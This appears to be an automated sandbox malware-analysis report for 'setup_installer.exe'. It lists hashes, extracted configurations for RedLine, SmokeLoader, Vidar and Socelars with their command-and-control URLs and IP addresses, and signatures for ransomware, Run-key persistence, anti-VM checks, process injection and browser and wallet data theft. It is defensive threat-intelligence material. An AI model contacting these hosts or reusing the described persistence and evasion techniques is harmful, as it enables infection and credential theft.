Resubmissions
28-10-2021 15:53
211028-tbqhfabhb2 1028-10-2021 05:27
211028-f5paksheak 1027-10-2021 14:29
211027-rt28vafah7 10Analysis
-
max time kernel
899s -
max time network
1329s -
submitted
01-01-1970 00:00
Static task
static1
Behavioral task
behavioral1
Sample
setup_installer.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_installer.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_installer.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_installer.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_installer.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_installer.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
setup_installer.exe
Resource
win10-de-20210920
General
-
Target
setup_installer.exe
-
Size
4.6MB
-
MD5
b356bccf8b9aff2897ecc42970367f44
-
SHA1
fe06861ac4952834ddc290dd5e0e7f36c8adc018
-
SHA256
b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3
-
SHA512
7fc510e5575e36919c302ff053eef6f7cb5700e9e011fb5d85dd80c5ec9c97664dcad8b6607b68b10daf8a6fbc584ff1218c30e541431fd32570da8553c662b7
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
chris
194.104.136.5:46013
Extracted
redline
media26
91.121.67.60:23325
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3216 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6224 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5632 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4448 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5884 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4236 2500 rundll32.exe 146 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3640 2500 rundll32.exe 146 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral5/memory/3964-283-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral5/memory/3964-288-0x0000000000418D32-mapping.dmp family_redline behavioral5/memory/752-287-0x0000000000418D26-mapping.dmp family_redline behavioral5/memory/752-284-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral5/files/0x000400000001abdf-159.dat family_socelars behavioral5/files/0x000400000001abdf-183.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 6048 created 6116 6048 WerFault.exe 173 PID 3536 created 3164 3536 WerFault.exe 147 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 5004 created 3032 5004 regsvr32.exe 9 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral5/memory/4280-444-0x0000000002FB0000-0x0000000003086000-memory.dmp family_vidar behavioral5/memory/4280-477-0x0000000000400000-0x0000000002C15000-memory.dmp family_vidar -
resource yara_rule behavioral5/files/0x000500000001abb8-122.dat aspack_v212_v242 behavioral5/files/0x000500000001abb8-124.dat aspack_v212_v242 behavioral5/files/0x000500000001abb6-123.dat aspack_v212_v242 behavioral5/files/0x000500000001abb6-130.dat aspack_v212_v242 behavioral5/files/0x000500000001abb6-129.dat aspack_v212_v242 behavioral5/files/0x000400000001abc0-127.dat aspack_v212_v242 behavioral5/files/0x000400000001abc0-131.dat aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run mstsc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\MJULMBUP5LM = "C:\\Program Files (x86)\\O9r6hzlkh\\_jxt0z7tbh.exe" mstsc.exe -
Blocklisted process makes network request 63 IoCs
flow pid Process 88 2104 cmd.exe 89 2104 cmd.exe 88 2104 cmd.exe 89 2104 cmd.exe 97 2104 cmd.exe 99 2104 cmd.exe 101 2104 cmd.exe 102 2104 cmd.exe 105 2104 cmd.exe 108 2104 cmd.exe 109 2104 cmd.exe 114 2104 cmd.exe 115 2104 cmd.exe 131 2104 cmd.exe 241 2104 cmd.exe 243 2104 cmd.exe 263 2104 cmd.exe 493 1872 cmd.exe 1028 4288 MsiExec.exe 1031 4288 MsiExec.exe 1032 4288 MsiExec.exe 1033 4288 MsiExec.exe 1034 4288 MsiExec.exe 1035 4288 MsiExec.exe 1036 4288 MsiExec.exe 1037 4288 MsiExec.exe 1038 4288 MsiExec.exe 1040 4288 MsiExec.exe 1041 4288 MsiExec.exe 1042 4288 MsiExec.exe 1043 4288 MsiExec.exe 1044 4288 MsiExec.exe 1045 4288 MsiExec.exe 1046 4288 MsiExec.exe 1047 4288 MsiExec.exe 1048 4288 MsiExec.exe 1049 4288 MsiExec.exe 1050 4288 MsiExec.exe 1052 4288 MsiExec.exe 1053 4288 MsiExec.exe 1054 4288 MsiExec.exe 1055 4288 MsiExec.exe 1056 4288 MsiExec.exe 1057 4288 MsiExec.exe 1058 4288 MsiExec.exe 1059 4288 MsiExec.exe 1060 4288 MsiExec.exe 1063 4288 MsiExec.exe 1065 4288 MsiExec.exe 1066 4288 MsiExec.exe 1068 4288 MsiExec.exe 1069 4288 MsiExec.exe 1070 4288 MsiExec.exe 1071 4288 MsiExec.exe 1072 4288 MsiExec.exe 1073 4288 MsiExec.exe 1074 4288 MsiExec.exe 1075 4288 MsiExec.exe 1076 4288 MsiExec.exe 1077 4288 MsiExec.exe 1078 4288 MsiExec.exe 1079 4288 MsiExec.exe 1080 4288 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
pid Process 1380 setup_install.exe 1224 Wed09f257bb7877d00b2.exe 2392 Wed096a1bff61.exe 3652 Wed09db0d52c38.exe 3960 Wed09cfb2f9758281d8.exe 1508 Wed09e95ff6b5.exe 2328 Conhost.exe 1336 Wed0971f17486f8.exe 2420 Wed09d8d6edfaff2ac.exe 2492 Wed09b3a5ca1a712d390.exe 3168 Wed09abf83d9c2.exe 3196 Wed09d27135e5a8b3b.exe 2104 Wed09c42cad92c20f79.exe 2012 Wed09977fdc12334.exe 1764 Wed094c47c32b.exe 3908 Wed09b2a8bc4f16cb.exe 3392 Wed09abf83d9c2.exe 3724 Wed09d27135e5a8b3b.tmp 1388 LzmwAqmV.exe 2840 Wed09d27135e5a8b3b.exe 4108 BCleanSoft82.exe 4196 inst1.exe 4216 Wed09d27135e5a8b3b.tmp 4280 Soft1WW02.exe 752 Wed0971f17486f8.exe 3964 Wed0901eb1dae126e32.exe 4424 4.exe 4588 5.exe 4740 search_hyperfs_206.exe 4868 setup.exe 4972 reg.exe 5084 4386.exe 4172 10.exe 4540 Chrome5.exe 2364 485024.exe 4396 5661510.exe 4864 838218.exe 4360 4220952.exe 4352 XYB0bVL96aEKhA.exE 3164 run.exe 3640 postback.exe 1696 run2.exe 5136 WinHoster.exe 5156 MicrosoftEdge.exe 5360 3045238.exe 5544 8467150.exe 5636 7780882.exe 5836 3898642.exe 6116 3496843.exe 1228 4437894.exe 5104 4624655.exe 4100 LzmwAqmV.exe 6932 yYo8bW5_Dr75hNsA4MSUHZEb.exe 6804 yYo8bW5_Dr75hNsA4MSUHZEb.exe 5748 Conhost.exe 5616 mBeq4rQAAJTfUezIixpwFY0d.exe 6364 cAYo3Q8suZBbt4C5trcF26B3.exe 6548 a4hC89JjzvN7O07q6G1UDT5s.exe 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 6492 PpZycQHNdq11TTqAPAUEHirn.exe 4680 Altrove.exe.com 6608 ck_6NCtiU3bUjW3jzeMQBw0u.exe 3880 c159B_KHXHENlHi35uxznXRu.exe 4932 TFugsa9rfWRW0F_k6pkijv3W.exe -
Tries to connect to .bazar domain 4 IoCs
Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.
flow ioc 834 reddew28c.bazar 835 bluehail.bazar 836 whitestorm9p.bazar 841 aqsouhyw.bazar -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 743B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 743B.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Taegeguxobu.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Wed09977fdc12334.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation wpbaYsMbAbjbDC4O72ATMD6h.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Jocaezhagiba.exe -
Loads dropped DLL 64 IoCs
pid Process 1380 setup_install.exe 1380 setup_install.exe 1380 setup_install.exe 1380 setup_install.exe 1380 setup_install.exe 1380 setup_install.exe 3724 Wed09d27135e5a8b3b.tmp 4216 Wed09d27135e5a8b3b.tmp 5084 4386.exe 5084 4386.exe 2812 rundll32.exe 6568 taskkill.exe 6568 taskkill.exe 6268 rundll32.exe 5084 4386.exe 5084 4386.exe 5084 4386.exe 5932 msiexec.exe 5932 msiexec.exe 6592 setup.exe 6592 setup.exe 5616 mBeq4rQAAJTfUezIixpwFY0d.exe 5616 mBeq4rQAAJTfUezIixpwFY0d.exe 6004 mBeq4rQAAJTfUezIixpwFY0d.exe 6004 mBeq4rQAAJTfUezIixpwFY0d.exe 6592 setup.exe 6592 setup.exe 6592 setup.exe 5168 Calculator.exe 5912 C71D.exe 5168 Calculator.exe 5168 Calculator.exe 4564 U_tSRTpe9iuHA7rySgKJYnb3.tmp 1184 x9ASqAjzf_Bbkm30Jcu897HP.exe 1184 x9ASqAjzf_Bbkm30Jcu897HP.exe 5252 Calculator.exe 3876 Calculator.exe 5008 D305.exe 5008 D305.exe 6592 setup.exe 1184 x9ASqAjzf_Bbkm30Jcu897HP.exe 7340 Calculator.exe 7340 Calculator.exe 7340 Calculator.exe 7356 Calculator.exe 7348 Calculator.exe 7348 Calculator.exe 7356 Calculator.exe 7348 Calculator.exe 7356 Calculator.exe 7468 Calculator.exe 7468 Calculator.exe 7468 Calculator.exe 7468 Calculator.exe 7484 Calculator.exe 7484 Calculator.exe 7484 Calculator.exe 7484 Calculator.exe 5084 4386.exe 7340 Calculator.exe 1184 x9ASqAjzf_Bbkm30Jcu897HP.exe 8076 Calculator.exe 8076 Calculator.exe 8076 Calculator.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4980 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" PpZycQHNdq11TTqAPAUEHirn.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\SHaefasotega.exe\"" DYbALA.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run build3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" build3.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 4220952.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce PpZycQHNdq11TTqAPAUEHirn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Dedyfilytu.exe\"" DYbALA.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a10ad8b7-4b73-4fc7-be07-0e91604e81ac\\B0DE.exe\" --AutoStart" B0DE.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA search_hyperfs_206.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ux7B70MQMWMvzY_raGDAzZ3z.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA installer.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA foldershare.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PpZycQHNdq11TTqAPAUEHirn.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CGDdIXA0PUg531oqccqn7mSz.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PevlGZ3PxwUKzaOKeJMTqLD6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA uX3Qqm8F5HavxjTh58PMEXEs.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Wadykerulu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA installer.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA foldershare.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Wed09d27135e5a8b3b.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Wed09e95ff6b5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA installer.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA JaiWjlrNxwqygP7FOh0EGpEb.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA build3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Culaqaecijy.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Altrove.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA postback.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LzmwAqmV.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 743B.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XYB0bVL96aEKhA.exE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA a4hC89JjzvN7O07q6G1UDT5s.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Cezhenipoly.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0Bone6aXxnHu42vsLpUqYgSL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA U_tSRTpe9iuHA7rySgKJYnb3.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\J: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 20 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 295 ipinfo.io 614 ipinfo.io 801 api.2ip.ua 136 ipinfo.io 137 ipinfo.io 293 ipinfo.io 100 freegeoip.app 109 freegeoip.app 105 freegeoip.app 294 ipinfo.io 425 ipinfo.io 617 ipinfo.io 8 ip-api.com 102 freegeoip.app 613 ipinfo.io 618 ipinfo.io 777 api.2ip.ua 778 api.2ip.ua 138 ipinfo.io 412 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 26 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 98CD429E44C7BD38 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{D150A421-63CD-46E4-ADDB-794A26A5C800} svchost.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\sqtvvs.exe svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 72F17FB9DDB14373 svchost.exe File opened for modification C:\Windows\System32\Tasks\Azure-Update-Task svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 85651DF49C63B3B4 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 1764 0Bone6aXxnHu42vsLpUqYgSL.exe 3120 0Bone6aXxnHu42vsLpUqYgSL.exe 9060 743B.exe -
Suspicious use of SetThreadContext 21 IoCs
description pid Process procid_target PID 2328 set thread context of 3964 2328 Conhost.exe 119 PID 1336 set thread context of 752 1336 Wed0971f17486f8.exe 118 PID 4020 set thread context of 5276 4020 svchost.exe 155 PID 6116 set thread context of 5648 6116 3496843.exe 182 PID 3164 set thread context of 3480 3164 run.exe 194 PID 1048 set thread context of 3032 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 9 PID 6608 set thread context of 3032 6608 ck_6NCtiU3bUjW3jzeMQBw0u.exe 9 PID 4736 set thread context of 3032 4736 ck_6NCtiU3bUjW3jzeMQBw0u.exe 9 PID 1048 set thread context of 3032 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 9 PID 4772 set thread context of 1768 4772 tTFv5eumajuqhmuOdEfEaVku.exe 243 PID 2288 set thread context of 4056 2288 0hp5lI2f2FoyQfBIrXA9ES2X.exe 249 PID 4880 set thread context of 6308 4880 z4HyLiMdE8kxdxosrFQYODgR.exe 250 PID 6320 set thread context of 3032 6320 mstsc.exe 9 PID 6172 set thread context of 5000 6172 A8A6.exe 278 PID 9624 set thread context of 5040 9624 B0DE.exe 486 PID 9128 set thread context of 4420 9128 B0DE.exe 504 PID 8972 set thread context of 9108 8972 build3.exe 509 PID 4376 set thread context of 2116 4376 build2.exe 514 PID 5004 set thread context of 8868 5004 regsvr32.exe 530 PID 9732 set thread context of 7140 9732 mstsca.exe 552 PID 6084 set thread context of 5700 6084 mstsca.exe 570 -
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral5/files/0x000400000001abe0-167.dat autoit_exe behavioral5/files/0x000400000001abe0-189.dat autoit_exe -
Drops file in Program Files directory 34 IoCs
